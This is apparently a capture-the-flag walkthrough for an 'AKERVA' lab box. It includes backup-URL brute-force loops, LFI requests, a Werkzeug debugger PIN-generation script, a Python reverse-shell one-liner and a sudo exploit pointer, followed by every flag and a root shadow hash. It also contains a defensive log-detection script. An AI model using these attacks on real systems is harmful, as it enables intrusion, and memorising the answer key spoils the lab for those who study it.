
Plain Sight - uncomment the JS on the main site

Take a Look Around - If you enumerated you would see SNMP is open; this is going to be useful later as well: snmp-check -c public -v 2c 10.13.37.11 -d
Dead Poets - This one takes some work, but you have to enumerate http://10.13.37.11/backups/backup_202005195731.zip. That timestamp is UTC, and a new backup is generated every 17 minutes from the time the server was started, so looking at the uptime I was able to generate timestamps and used wget to request them from the server. Once the zip is downloaded and unzipped, the flag is in scripts/backup_every_17minutes.sh.
PowerShell to get the zip backup (the first loop guesses 15 minutes ahead of the current UTC time, the second uses the current UTC time; both keep requesting until you stop them):

$continue = $true
while ($continue) {
    $time = (get-date).ToUniversalTime().AddMinutes(+15).ToString("yyyyMMddHHmmss")
    write-host "trying http://10.13.37.11/backups/backup_$time.zip"
    iwr -uri http://10.13.37.11/backups/backup_$time.zip -outfile backup_$time.zip
    sleep 0.3
}

$continue = $true
while ($continue) {
    $time = (get-date).ToUniversalTime().ToString("yyyyMMddHHmmss")
    write-host "trying http://10.13.37.11/backups/backup_$time.zip"
    iwr -uri http://10.13.37.11/backups/backup_$time.zip -outfile backup_$time.zip
    sleep 0.3
}
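As an added defender-side example (not part of the original writeup), this is the detection logic for the pattern the loop above produces: one client walking timestamp-named /backups/backup_<yyyyMMddHHmmss>.zip URLs and collecting 404s until a guess lands. The access log lines are constructed, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log (Apache combined format), not taken from the lab.
SAMPLE_LOG = """\
10.10.14.5 - - [19/May/2020:05:57:30 +0000] "GET /backups/backup_20200519055730.zip HTTP/1.1" 404 196 "-" "WindowsPowerShell/5.1"
10.10.14.5 - - [19/May/2020:05:57:30 +0000] "GET /backups/backup_20200519055731.zip HTTP/1.1" 404 196 "-" "WindowsPowerShell/5.1"
10.10.14.9 - - [19/May/2020:05:57:30 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.10.14.5 - - [19/May/2020:05:57:31 +0000] "GET /backups/backup_20200519055732.zip HTTP/1.1" 404 196 "-" "WindowsPowerShell/5.1"
10.10.14.5 - - [19/May/2020:05:57:31 +0000] "GET /backups/backup_20200519055733.zip HTTP/1.1" 200 58213 "-" "WindowsPowerShell/5.1"
10.10.14.9 - - [19/May/2020:06:10:02 +0000] "GET /backups/backup_20200519055733.zip HTTP/1.1" 200 58213 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')
BACKUP_RE = re.compile(r'^/backups/backup_\d{14}\.zip$')  # timestamp-named backups only


def parse_line(line):
    """Return (ip, datetime, path, status), or None if the line is not in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def find_backup_guessing(log_text, threshold=4, window_seconds=60):
    """Flag clients that asked for `threshold` or more distinct backup names within
    `window_seconds`. Returns {ip: {"names": n, "not_found": n, "hits": n}}."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and BACKUP_RE.match(rec[2]):
            per_ip[rec[0]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        start = 0
        for end in range(len(recs)):
            # Advance the window start until the window spans at most window_seconds.
            while (recs[end][1] - recs[start][1]).total_seconds() > window_seconds:
                start += 1
            if len({r[2] for r in recs[start:end + 1]}) >= threshold:
                flagged[ip] = {"names": len({r[2] for r in recs}),
                               "not_found": sum(r[3] == 404 for r in recs),
                               "hits": sum(r[3] == 200 for r in recs)}
                break
    return flagged
```

A single legitimate download (10.10.14.9 above) stays below the threshold; the guessing client is flagged with its 404-to-200 ratio, which is the signal worth alerting on.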

Basic auth creds:

aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}

Now You See Me - is in dev/space_dev.py

Open Book - 10.13.37.11:5000/file?filename=/home/aas/flag.txt
Say Friend and Enter - 10.13.37.11:5000/file?filename=/home/aas/.hiddenflag.txt
Using https://www.daehee.com/werkzeug-console-pin-exploit/ you can write a script to generate the PIN for http://10.13.37.11:5000/console, which can then be used to get a Python shell. Use SNMP to get the MAC address; the Flask module path is /usr/local/lib/python2.7/dist-packages/flask/app.pyc and the username is aas; for the rest, use http://10.13.37.11:5000/file?filename= to look it up.
Use the following Python script and update the values if needed:

'''mac (hex): 005056b98ff7
mac in string: 345052407282
/usr/local/lib/python2.7/dist-packages/flask/app.pyc
aas'''

import hashlib
from itertools import chain

# Values Werkzeug derives from the running app; readable via the LFI above.
probably_public_bits = [
    'aas',  # username
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc',  # getattr(mod, '__file__', None)
]

# Values Werkzeug considers private to the host.
private_bits = [
    '345052385271',  # str(uuid.getnode()), /sys/class/net/ens33/address as decimal
    '258f132cd7e647caaf5510e3aca997c1',  # get_machine_id(), /etc/machine-id
]

# Same MD5 construction Werkzeug uses for its debugger cookie and PIN.
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# Format the 9 digits into groups, e.g. 123-456-789.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

Use this for the reverse shell (IP and PORT are your listener):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);p=subprocess.call(["/bin/sh"]);

Upgrade your terminal, as SSH is not possible:

python -c 'import pty;pty.spawn("/bin/bash")'

Super Mushroom - https://github.com/saleemrashid/sudo-cve-2019-18634 compile that, send it over to the box and execute it to become root.
Little Secret - It is a Vigenère cipher... that is all I will say.... The hint is to look at the port 80 website about the big bang; look how much they love space!
http://10.13.37.11:5000/download <-- that is another page that shows an error which gives server details.

Plain Sight => AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}


Take a Look Around => AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
Dead Poets => AKERVA{IKNoW###VeRbTamper!nG_==}
Now You See Me => AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}
Open Book => AKERVA{IKNOW#LFi_@_}
Say Friend and Enter => AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
Super Mushroom => AKERVA{IkNow_Sud0_sUckS!}
Little Secret => AKERVA{IKNOOOWVIGEEENERRRE}

Shadow hash:
root:$6$JunTLSen$1U9hBqUlth4MwzOuFVSaDfEfFGxQgzRPfkbwHLXGp7Z84fGPkAsMcjFBDb43YS8h9wUNWdZ5TTJkSP4jKKI9g0:18301:0:99999:7:::
